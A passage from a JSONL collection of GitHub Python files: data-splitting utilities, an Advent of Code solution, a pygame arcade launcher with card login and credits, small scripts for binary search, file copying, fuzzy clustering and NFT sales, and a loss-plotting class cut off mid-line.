},\n {\n 'original': validation data\n 'new': validation data with new missing values\n }\n )\n \"\"\"\n threshold = int(train_proportion * self.__data.shape[0])\n added_na = self.generate_more_nan(self.__data).T\n train = {\n 'original': self.__data.iloc[:, threshold:],\n 'new': added_na.iloc[:, threshold:]\n }\n valid = {\n 'original': self.__data.iloc[:, :threshold],\n 'new': added_na.iloc[:, :threshold]\n }\n return train, valid, added_na\n\n def generate_more_nan(self, data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Generates new missing values in the data, with a proportion of `na_proportion`\n \"\"\"\n n = data.shape[0] * data.shape[1]\n k = int(self.na_prop * n)\n mask = np.ones(n)\n mask[:k] = np.NaN\n np.random.shuffle(mask)\n mask = mask.reshape(data.shape)\n return data.multiply(mask)\n\n @staticmethod\n def number_of_na_in_ts(ts: pd.Series) -> int:\n \"\"\"\n Removes all the NaNs at the beginning (assume the first value is never \n missing), then counts the number of NaNs.\n See test below.\n \"\"\"\n index_first_non_na = ts.first_valid_index()\n ts = ts[index_first_non_na:]\n return ts.isna().sum()\n\n @staticmethod\n def df_to_string(df: pd.DataFrame, name: str) -> str:\n \"\"\"\n Displays relevant information about the DF\n \"\"\"\n return f\"{name} {df.shape} ({df.isna().sum().sum()} missing values) :\\n\" + df.head().__str__()\n\n def __str__(self) -> str:\n return \"\\n\".join([\n SplitDataFrame.df_to_string(self.data, \"Original data\"),\n SplitDataFrame.df_to_string(self.train['original'], \"Train original\"),\n SplitDataFrame.df_to_string(self.train['new'], \"Train new\"),\n SplitDataFrame.df_to_string(self.valid['original'], \"Valid original\"),\n SplitDataFrame.df_to_string(self.valid['new'], \"Valid new\")\n ])\n\n\nif __name__ == '__main__':\n # Writing quick tests here\n x = pd.Series([None, None, 1, 2, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 0\n x = pd.Series([None, None, 1, 2, None, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 1\n x = pd.Series([1, 2, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 0\n x = pd.Series([1, 2, None, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 1\n # Test for main function\n x = SplitDataFrame(pd.DataFrame(np.random.choice([1, np.NaN], size=(10, 10), p=[.95, .05])))\n print(x)\n","repo_name":"aichabokbot/missing_values_imputation","sub_path":"src/split_data_frame.py","file_name":"split_data_frame.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22320663176","text":"from utils.test import get_challenge_data, test_before_submit\nimport os\n\nAOC_SESSION = os.getenv(\"AOC_SESSION\") \nday=4\n\ndf = get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"])\n\ndef get_answers(df):\n df[\"First Start\"] = df[\"First Elf\"].str.split(\"-\").str[0].astype(int)\n df[\"First End\"] = df[\"First Elf\"].str.split(\"-\").str[1].astype(int)\n df[\"Second Start\"] = df[\"Second Elf\"].str.split(\"-\").str[0].astype(int)\n df[\"Second End\"] = df[\"Second Elf\"].str.split(\"-\").str[1].astype(int)\n\n df[\"between\"] = (df[\"Second Start\"].between(df[\"First Start\"],df[\"First End\"]) & df[\"Second End\"].between(df[\"First Start\"],df[\"First End\"])) | (df[\"First Start\"].between(df[\"Second Start\"],df[\"Second End\"]) & df[\"First End\"].between(df[\"Second Start\"],df[\"Second End\"]))\n\n df[\"overlap\"] = df[\"Second Start\"].between(df[\"First Start\"],df[\"First End\"]) | df[\"Second End\"].between(df[\"First Start\"],df[\"First End\"]) | df[\"First Start\"].between(df[\"Second Start\"],df[\"Second End\"]) | df[\"First End\"].between(df[\"Second Start\"],df[\"Second End\"])\n \n part_one = df[df[\"between\"]==True].count()[\"between\"]\n part_two = df[df[\"overlap\"]==True].count()[\"between\"]\n\n return part_one, part_two\n\ndef main():\n test_part_one,test_part_two = get_answers(get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"]))\n part_one,part_two = get_answers(get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"], run_type=\"actual\"))\n\n if part_two and part_one:\n test_before_submit(day, part=\"b\", test_answer=test_part_two, answer=part_two)\n elif part_one:\n test_before_submit(day, part=\"a\", test_answer= test_part_one, answer=part_one)\n else:\n raise ValueError(\"Missing Answers\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"BethDataHub/Advent-of-code-2022","sub_path":"Day_4.py","file_name":"Day_4.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2223180972","text":"import os\nimport subprocess\nimport sys\nfrom enum import Enum\nfrom threading import Thread\nfrom typing import Any\n\n# Import non-standard modules\nimport pygame\nimport pygame_menu # https://pygame-menu.readthedocs.io/en/4.2.4/index.html\nimport pygame_menu.controls as ctrl\nfrom pygame.locals import *\n\npygame.init()\n\n# Initialize controller\njoysticks = []\nfor i in range(pygame.joystick.get_count()):\n joysticks.append(pygame.joystick.Joystick(i))\nfor joystick in joysticks:\n joystick.init()\nanalog_keys = {0: 0, 1: 0, 2: 0, 3: 0, 4: -1, 5: -1}\n\nfrom src import jadoor\nfrom src.jadoor.credit import Credit\n# Import class\nfrom src.misc import Misc\n\n\nclass View(Enum):\n LOGIN_MENU = 1\n SOLO_GAMES_LIST_MENU = 2\n DUO_GAMES_LIST_MENU = 3\n IN_GAME_MENU = 4\n\n\nclass User():\n\n def __init__(self, login):\n self.login = login\n\n\nclass Game():\n\n def __init__(self, name, config):\n self.name = name\n self.executablePath = config['EXECUTABLE_PATH']\n self.language = config['LANGUAGE']\n self.dependencies_script = config['DEPENDENCIES_SCRIPT']\n self.inputs = config['INPUTS']\n self.version = config['VERSION']\n self.modes = config['GAMEMODES']\n self.scoreboards = Misc.read_yaml(file_path=\"games/\" + self.name + \"/scoreboard.yaml\")\n\n def launch(self, mode, users, launcher):\n u = [user.login for user in users]\n process = subprocess.run(\n args=[mode, ''.join(u)],\n executable=\"./\" + self.executablePath,\n capture_output=True,\n cwd=\"games/\" + self.name + \"/\"\n )\n print(process)\n launcher.view = View.LOGIN_MENU\n\n\nclass Launcher:\n\n\n def __init__(self):\n self.view = View.LOGIN_MENU\n self.connectedUsers = [None]\n self.selectedGame = None\n self.availableGames = dict()\n self.logout_timer = 0\n self.jadoor = jadoor.JaDoor()\n self.credit = jadoor.credit.Credit()\n\n def __handleKeydown(self, event):\n if event.unicode == 's':\n self.view = View.SOLO_GAMES_LIST_MENU\n elif event.unicode == 'd':\n self.view = View.DUO_GAMES_LIST_MENU\n\n def __handlejoystick(self, event):\n if event.button == 8:\n self.view = View.SOLO_GAMES_LIST_MENU\n if event.button == 9:\n self.view = View.DUO_GAMES_LIST_MENU\n\n def __update(self, dt):\n events = pygame.event.get()\n\n currentView = self.view\n if self.view == View.LOGIN_MENU:\n self.loginMenu.update(events)\n elif self.view == View.SOLO_GAMES_LIST_MENU:\n self.soloGamesListMenu.update(events)\n elif self.view == View.DUO_GAMES_LIST_MENU:\n self.duoGamesListMenu.update(events)\n elif self.view == View.IN_GAME_MENU:\n self.inGameMenu.update(events)\n\n for event in events:\n if event.type == pygame.JOYBUTTONDOWN:\n self.__handlejoystick(event)\n elif event.type == pygame.KEYDOWN:\n self.__handleKeydown(event)\n\n def __draw(self, screen):\n screen.fill((0, 0, 0))\n\n # Redraw screen here.\n currentView = self.view\n if self.view == View.LOGIN_MENU:\n self.loginMenu.draw(screen)\n elif self.view == View.SOLO_GAMES_LIST_MENU:\n self.soloGamesListMenu.draw(screen)\n elif self.view == View.DUO_GAMES_LIST_MENU:\n self.duoGamesListMenu.draw(screen)\n elif self.view == View.IN_GAME_MENU:\n self.inGameMenu.draw(screen)\n\n pygame.display.flip()\n\n def __updateSoloScoreboard(self, selected: Any, value: int):\n for i in range(len(self.soloScoreboard._rows) - 1, 0, -1):\n self.soloScoreboard.remove_row(self.soloScoreboard._rows[i])\n scoreboard = selected[0][1].scoreboards['SOLO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'silver', 'darkorange3']\n self.soloScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.soloScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.soloScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.soloScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n\n def __launchSoloGame(self, selected: Any, value: int):\n if self.credit.check(self.connectedUsers[0].login) is False:\n return\n self.selectedGame = selected[0][1]\n self.view = View.IN_GAME_MENU\n t = Thread(target=self.selectedGame.launch, args=(\"solo\", self.connectedUsers, self))\n self.credit.consume(self.connectedUsers[0].login)\n t.start()\n\n def __launchDuoGame(self, selected: Any, value: int):\n if self.credit.check(self.connectedUsers[0].login) is False or self.credit.check(self.connectedUsers[1].login) is False:\n return\n self.selectedGame = selected[0][1]\n self.view = View.IN_GAME_MENU\n t = Thread(target=self.selectedGame.launch, args=(\"duo\", self.connectedUsers, self))\n self.credit.consume(self.connectedUsers[0].login)\n self.credit.consume(self.connectedUsers[1].login)\n t.start()\n\n def __getAvailablesGames(self, mode):\n ret = dict()\n for game in self.availableGames.values():\n if mode in game.modes:\n ret[game.name] = self.availableGames[game.name]\n return list(zip(ret.keys(), ret.values()))\n\n def __initComponents(self):\n # SHARED CONTENT\n self.menuBackground = pygame_menu.BaseImage(image_path=\"medias/arcade_bg.jpg\")\n self.arcadeFont20 = pygame_menu.font.get_font(\"medias/ArcadeFont.ttf\", 20)\n self.arcadeFont40 = pygame_menu.font.get_font(\"medias/ArcadeFont.ttf\", 40)\n mainTheme = pygame_menu.themes.THEME_DARK.copy()\n mainTheme.set_background_color_opacity(0.6)\n mainTheme.title_font = self.arcadeFont40\n mainTheme.widget_font = self.arcadeFont40\n\n # LOGIN MENU\n self.loginMenu = pygame_menu.Menu(title=\"Login\", width=1600, height=900, theme=mainTheme)\n loginMenuContent = \\\n \"Pull your student card out of your wallet\\n\" \\\n \"Place the card in front of the reader\\n\" \\\n \"Enjoy !\\n\"\n self.loginMenu.add.label(loginMenuContent, max_char=-1)\n\n # GAMES LIST MENU\n # SOLO\n self.soloGamesListMenu = pygame_menu.Menu(title=\"Games List (SOLO)\", width=1600, height=900, theme=mainTheme)\n if len(self.__getAvailablesGames(mode='solo')):\n self.soloGamesListMenu.add.label(\"Student login: None\", 'login_message')\n self.soloGamesListMenu.add.label(\"Credit state unknown\", 'credit_message')\n self.soloGamesListMenu.add.label(\"Logout in ? seconds\", 'logout_timer')\n\n def custom_joy_apply(event, _) -> bool:\n \"\"\"\n Custom widget apply event.\n \"\"\"\n condition = event.button == 10\n return condition\n\n new_ctrl_sel = ctrl.Controller()\n # new_ctrl_sel.joy_delay = 200 # ms\n new_ctrl_sel.joy_select = custom_joy_apply\n soloGameSelector = self.soloGamesListMenu.add.selector(\n title='Choose a game ',\n items=self.__getAvailablesGames(mode='solo'),\n default=0,\n onchange=self.__updateSoloScoreboard,\n onreturn=self.__launchSoloGame,\n )\n soloGameSelector.set_controller(new_ctrl_sel)\n\n self.soloScoreboard = self.soloGamesListMenu.add.table()\n self.soloScoreboard.translate(0, 40)\n self.soloScoreboard.default_cell_padding = 20\n self.soloScoreboard.add_row(['#RANK', 'Epitech login', \"SCORE\"], cell_font=self.arcadeFont20, cell_font_color='white')\n scoreboard = soloGameSelector.get_value()[0][1].scoreboards['SOLO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'slategray3', 'darkorange3']\n self.soloScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.soloScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.soloScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.soloScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n else:\n self.soloGamesListMenu.add.label(\"No games found\", max_char=-1)\n self.soloGamesListMenu.add.label(\"Student login: None\", 'login_message')\n self.soloGamesListMenu.add.label(\"Credit state unknown\", 'credit_message')\n\n # DUO\n self.duoGamesListMenu = pygame_menu.Menu(title=\"Games List (DUO)\", width=1600, height=900, theme=mainTheme)\n if len(self.__getAvailablesGames(mode='duo')):\n duoGameSelector = self.duoGamesListMenu.add.selector(\n title='Choose a game ',\n items=self.__getAvailablesGames(mode='duo'),\n default=0,\n # onchange = self.__updateDuoScoreboard,\n onreturn=self.__launchDuoGame,\n )\n\n self.duoScoreboard = self.duoGamesListMenu.add.table()\n self.duoScoreboard.translate(0, 40)\n self.duoScoreboard.default_cell_padding = 20\n self.duoScoreboard.add_row(['#RANK', 'Epitech login', 'SCORE'], cell_font=self.arcadeFont20, cell_font_color='white')\n scoreboard = duoGameSelector.get_value()[0][1].scoreboards['DUO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'slategray3', 'darkorange3']\n self.duoScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.duoScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.duoScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.duoScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n else:\n self.duoGamesListMenu.add.label(\"No games found\", max_char=-1)\n \n #IN GAME MENU\n self.inGameMenu = pygame_menu.Menu(title=\"\", width=1600, height=900, theme=mainTheme)\n self.inGameMenu.add.label(\"Game is still running\", max_char=-1)\n\n\n def __loadAvailableGames(self):\n mainFolder = './games'\n gameFolders = [name for name in os.listdir(mainFolder) if os.path.isdir(os.path.join(mainFolder, name))]\n for gameName in gameFolders:\n config = Misc.read_yaml(file_path=mainFolder + \"/\" + gameName + \"/config.yaml\")\n self.availableGames[gameName] = Game(name=gameName, config=config)\n\n def runPyGame(self):\n fps = 60\n fpsClock = pygame.time.Clock()\n screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n pygame.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\n\n self.__loadAvailableGames()\n self.__initComponents()\n\n # Main game loop.\n dt = 1 / fps\n student_login = None\n while True:\n self.__update(dt)\n self.__draw(screen)\n if self.view == View.LOGIN_MENU:\n if student_login is None:\n student_login = self.jadoor.read()\n else:\n self.connectedUsers[0] = User(student_login)\n student_login = None\n self.view = View.SOLO_GAMES_LIST_MENU\n self.soloGamesListMenu.get_widget('login_message').set_title(\"Login: \" + self.connectedUsers[0].login)\n self.soloGamesListMenu.get_widget('credit_message').set_title(\"Credits: \" + str(int(self.credit.check(self.connectedUsers[0].login))))\n self.logout_timer = 1800\n self.soloGamesListMenu.get_widget('logout_timer').set_title(\"Logout in \" + str(int(self.logout_timer / 60)) + \" seconds\")\n elif self.view in [View.SOLO_GAMES_LIST_MENU, View.DUO_GAMES_LIST_MENU]:\n self.soloGamesListMenu.get_widget('logout_timer').set_title(\"Logout in \" + str(int(self.logout_timer / 60)) + \" seconds\")\n self.logout_timer -= 1\n if self.logout_timer == 0:\n self.view = View.LOGIN_MENU\n self.connectedUsers = [None]\n dt = fpsClock.tick(fps)\n","repo_name":"Valipss/epiarcade","sub_path":"src/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":13153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3709989797","text":"from typing import List, Union\n\nnumeric = Union[int, float]\n\n\ndef find_target(arr: List[numeric], target: numeric) -> numeric:\n \"\"\"Find rightmost value less than or equal to target\"\"\"\n lo = 0\n hi = len(arr)\n while lo < hi:\n mid = (lo + hi) // 2\n if target < arr[mid]:\n hi = mid\n else:\n lo = mid + 1\n\n return arr[lo - 1]\n\n\ndef rightmost_value_in_sorted_array(arr: List[numeric], target: numeric) -> numeric:\n \"\"\"\n Find the rightmost value less than or equal to target in arr sorted array.\n :param arr: sorted array [int, float]\n :param target: target value [int, float]\n :return: the rightmost value or -1 if not found/error\n \"\"\"\n # Edge cases\n if type(target) in [int, float]:\n if len(arr) == 0:\n return -1\n elif len(arr) == 1:\n return arr[0]\n elif target <= arr[0]:\n return arr[0]\n elif target >= arr[-1]:\n return arr[-1]\n # Binary search\n else:\n return find_target(arr, target)\n\n return -1\n\n\nif __name__ == \"__main__\":\n a = [3, 4, 6, 9, 10, 12, 14, 15, 17, 19, 21]\n t = [12, 13]\n for i in t:\n print(f\"Output: {rightmost_value_in_sorted_array(a, i)}\")\n","repo_name":"Callaghan-Hattingh/rightmost_value_in_sorted_array_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22247347231","text":"import argparse\nimport os\nimport shutil\nfrom pathlib import Path\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Copy all files with given extension from src to dst\")\n parser.add_argument('-e', '--ext', default=None, help=\"Extension to copy\")\n parser.add_argument('-s', '--src', help=\"Src Directory\")\n parser.add_argument('-d', '--dst', help=\"Dst Directory\")\n args = parser.parse_args()\n for (path, dirs, files) in os.walk(args.src):\n pathExt = path[len(args.src)+1:]\n #print(\"EXT: {0}\".format(pathExt))\n for file in files:\n srcF = os.path.join(path, file)\n dstF = os.path.join(args.dst, pathExt, file)\n dstDir = os.path.dirname(dstF)\n #print(\"{0} {1} {2}\".format(srcF, dstF, dstDir))\n if args.ext is None or srcF.endswith(args.ext):\n if not os.path.exists(dstDir):\n Path(dstDir).mkdir(parents=True, exist_ok=True)\n print(\"Copy {0} to {1}\".format(srcF, dstF))\n shutil.copy(srcF, dstF)","repo_name":"microsoft/KubeDevice","sub_path":"hack/extcopy.py","file_name":"extcopy.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"33432456062","text":"from __future__ import annotations\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom constant import PICKLE\nfrom datatype.dataset import Dataset\nfrom fcmeans import FCM\nfrom textwrap import dedent\n\npd.set_option('display.max_colwidth', None)\n\n\ndef main() -> None:\n dataset = Dataset('segment')\n dataframe = dataset.load()\n\n print(dataframe[['filename', 'fcm_label_2d']])\n\n unique = dataframe.fcm_label_2d.unique()\n unique.sort()\n\n # print(unique)\n\n # size = [\n # len(dataframe[dataframe.fcm_label_2d == label])\n # for label in unique\n # ]\n\n # minimum = min(size)\n # maximum = max(size)\n\n # print(minimum, maximum)\n\n for index in range(1, 11):\n print(f\"[Trial {index}]\")\n\n n = 400\n small = []\n\n for label in unique:\n subset = dataframe[dataframe.fcm_label_2d == label]\n length = len(subset)\n\n # print(f\"{n} samples from a total of {length} for cluster {label}\")\n\n sample = subset.sample(n=n)\n small.append(sample)\n\n subset = pd.concat(small)\n\n columns = {'fcm_label_2d': 'fcm_label_2d_original'}\n subset = subset.rename(columns=columns)\n\n x = np.array(\n [\n subset.umap_x_2d,\n subset.umap_y_2d\n ]\n ).transpose()\n\n fcm = FCM(\n m=1.5,\n max_iter=150,\n n_clusters=19\n )\n\n fcm.fit(x)\n\n labels = fcm.predict(x)\n\n subset['fcm_label_2d_validation'] = labels\n\n dataset = Dataset('subset')\n dataset.save(subset)\n\n print(subset[['filename', 'fcm_label_2d_original', 'fcm_label_2d_validation']])\n\n\n comparison = (\n subset['fcm_label_2d_original'] ==\n subset['fcm_label_2d_validation']\n )\n\n length = len(comparison)\n\n percentage = (comparison.sum() / length) * 100\n percentage = round(percentage, 2)\n\n print(f\"{percentage}% \\n\")\n\n # figsize = (10, 8)\n # fig, ax = plt.subplots(figsize=figsize)\n\n # subset['fcm_label_2d_original'].value_counts().sort_index().plot(ax=ax, kind='bar')\n\n # plt.xlabel('FCM Label')\n # plt.ylabel('Count')\n # plt.title('FCM Label 2D: Original')\n\n # plt.show()\n\n # figsize = (10, 8)\n # fig, ax = plt.subplots(figsize=figsize)\n\n # subset['fcm_label_2d_validation'].value_counts().sort_index().plot(ax=ax, kind='bar')\n\n # plt.xlabel('FCM Label')\n # plt.ylabel('Count')\n # plt.title('FCM Label 2D: Validation')\n\n # plt.show()\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/analysis/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16444132220","text":"import pandas as pd\nfrom reports.quarterly_etl import QuarterlyReport\nfrom sources.nftrade import NftradeExtractor, NftradeTransformer\nfrom quarterlyReport.nft.coingecko import prices\n\n\ndef get_data(price_file_path=\"../coingecko/prices_raw.csv\",\n start=QuarterlyReport().start_time,\n end=QuarterlyReport().end_time):\n chain = \"moonbeam\"\n df_prices = prices.get_data(price_file_path, chain, start, end)\n\n start, end = [t.strftime(\"%Y-%m-%d\") for t in [start, end]]\n data_all = []\n skip = 0\n i = 0\n while True:\n data = NftradeExtractor().extract(skip)\n data_all += data\n if data[-1][\"createdAt\"] > start:\n i += 1\n skip = NftradeExtractor().limit * i\n else:\n break\n df = NftradeTransformer(data_all).to_frame()\n\n df = df.query(\"@start <= createdAt <= @end and type == 'SOLD'\").copy()\n df[\"date\"] = df[\"createdAt\"].str.slice(stop=10)\n df = df.merge(df_prices)\n df[\"totalUSD\"] = df[\"price\"].astype(float) * df[\"prices\"]\n df = df.reindex(columns=[\"date\", \"totalUSD\"])\n\n index = pd.date_range(start, end, freq=\"1D\",\n name=\"date\").strftime(\"%Y-%m-%d\")[:-1]\n df = df.groupby(\"date\").sum().reindex(index=index, fill_value=0)\n df[\"chain\"] = chain\n df.reset_index(inplace=True)\n\n return df\n\n\nif __name__ == \"__main__\":\n sales = get_data()\n print(sales)\n","repo_name":"tara-nguyen/crypto-data","sub_path":"quarterlyReport/nft/nftrade/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5283123155","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, os\nimport argparse\n\nfrom . import wrapper\n\nplt.ioff()\n\n##############################################################################################################\n\nclass TRAINING_LOSS():\n\t\"\"\"\n\tManages data regarding the evoluction of a model's loss in training. \n\t\"\"\"\n\tdef __init__(self):\n\t\t\n\t\tself.default_params = wrapper.PARAM_WRAPPER().get_default_params(\"training_loss\")\n\t\tself.params = self.default_params.copy()\n\n\t\tself.loss_graph = [[]]\n\t\tself.patience_graph = [[]]\n\t\tself.plot_loss = None\n\n\t\treturn\n\n\tdef set_params(self, **kwargs):\n\n\t\tparam_names = self.default_params.keys()\n\t\tfor i,j in kwargs.items():\n\t\t\tif i in param_names: self.params[i] = j\n\n\t\tself.update_params()\n\t\tself.update_names()\n\n\t\treturn\n\n\tdef update_params(self):\n\t\tfor k, v in self.params.items():\n\t\t\tsetattr(self, k, v)\n\t\treturn\n\n\tdef update_names(self):\n\t\t# CHECK\n\t\tfor key, val in self.params.items(): # param_path not needed to load the model\n\t\t\tif val is None: return \"ERROR (TRAINING_LOSS.update_names): param '{}' is None\".format(key)\n\n\t\tself.plot_loss = self.plot_path + \"/loss_\" + self.mymodel.name\n\t\tself.plot_loss_complete = self.plot_path + \"/loss_complete_\" + self.mymodel.name\n\n\t\treturn None\n\n\tdef load_data(self):\n\t\t# CHECK\n\t\tfor key in self.params.keys():\n\t\t\tif self.params[key] is None: return \"ERROR (TRAINING_LOSS.load_data): param '{}' is None\".format(key)\n\n\t\ttry:\n\t\t\tself.loss_graph, self.patience_graph = torch.load(self.plot_loss)\n\t\texcept:\n\t\t\treturn \"ERROR (TRAINING_LOSS.load_data): error occurred while loading loss data from '{}'\".format(self.plot_loss)\n\n\t\treturn None\n\n\tdef add(self, plot, patience):\n\t\tself.loss_graph[-1] += [plot]\n\t\tself.patience_graph[-1] += [patience]\n\t\treturn\n\n\tdef restart(self):\n\t\tself.loss_graph += [[]]\n\t\tself.patience_graph += [[]]\n\t\treturn\n\n\tdef save(self):\n\t\ttorch.save([self.loss_graph, self.patience_graph], self.plot_loss)\n\t\treturn\n\n\tdef plot(self):\n\t\t# CHECKING\n\t\tplt.cla()\n\t\tif len(self.loss_graph) == [[]]: \n\t\t\terror = self.load_data()\n\t\t\tif error != None: return error\n\t\tif len(self.loss_graph) == [[]]: return \"ERROR (TRAINING_LOSS.plot): Empty data\"\n\n\t\tloss, patience = self.loss_graph, self.patience_graph\n\t\tif len(loss[-1])==0: loss=loss[:-1]; patience=patience[:-1]\n\n\t\t# CREATE X, Y\n\t\tloss = [np.array(loss_i) for loss_i in loss]\n\t\tcolors = [\"blue\", \"red\"]\n\t\tepoch = [np.array(range(len(loss[0]))) + 1]\n\t\tfor i in np.arange(1, len(loss)): \n\t\t\tepoch += [np.array(range(len(loss[i]))) + epoch[-1][-1] + 1]\n\n\t\t# CREATE PLOT\n\t\tif \"MLP\" in self.mymodel.mod: \n\t\t\tfig1 = plt.figure(3, figsize=[7,5])\n\t\t\tax11 = fig1.add_subplot(111)\n\t\t\tax11.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tif (\"BCE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 200):\n\t\t\t\tax11.set_ylim(0, 200)\n\t\t\telif (\"CE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 20):\n\t\t\t\tax11.set_ylim(0, 20)\n\t\tif (\"VAE\" in self.mymodel.mod) or (\"flow\" in self.mymodel.mod): \n\t\t\tfig1 = plt.figure(3, figsize=[7*3,5])\n\t\t\tax11 = fig1.add_subplot(131)\n\t\t\tax12 = fig1.add_subplot(132)\n\t\t\tax13 = fig1.add_subplot(133)\n\t\t\tax11.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tax12.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tax13.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tif (\"BCE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 200):\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 100])\n\t\t\t\tax11.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,1]), np.min(loss[1][:,1]), np.min(loss[2][:,1])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,1]), self.mymodel.beta*1E4])\n\t\t\t\tax12.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 100])\n\t\t\t\tax13.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\t\t\telif (\"CE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 20):\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 15])\n\t\t\t\tax11.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,1]), np.min(loss[1][:,1]), np.min(loss[2][:,1])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,1]), self.mymodel.beta*1E4])\n\t\t\t\tax12.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 15])\n\t\t\t\tax13.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t# PLOTTING\n\t\tfor i, (loss_i, epoch_i, patience_i) in enumerate(zip(loss, epoch, patience)):\n\n\t\t\tif \"MLP\" in self.mymodel.mod:\n\t\t\t\tax11.plot(epoch_i, loss_i, \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax11.plot(epoch_i, loss_i, \".\", color=colors[i%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch_i[p], loss_i[p]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\tax11.plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\n\n\t\t\tif (\"VAE\" in self.mymodel.mod) or (\"flow\" in self.mymodel.mod): \n\t\t\t\tax11.plot(epoch_i, loss_i[:,0], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax12.plot(epoch_i, loss_i[:,1], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax13.plot(epoch_i, loss_i[:,2], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax11.plot(epoch_i, loss_i[:,0], \".\", color=colors[i%2], 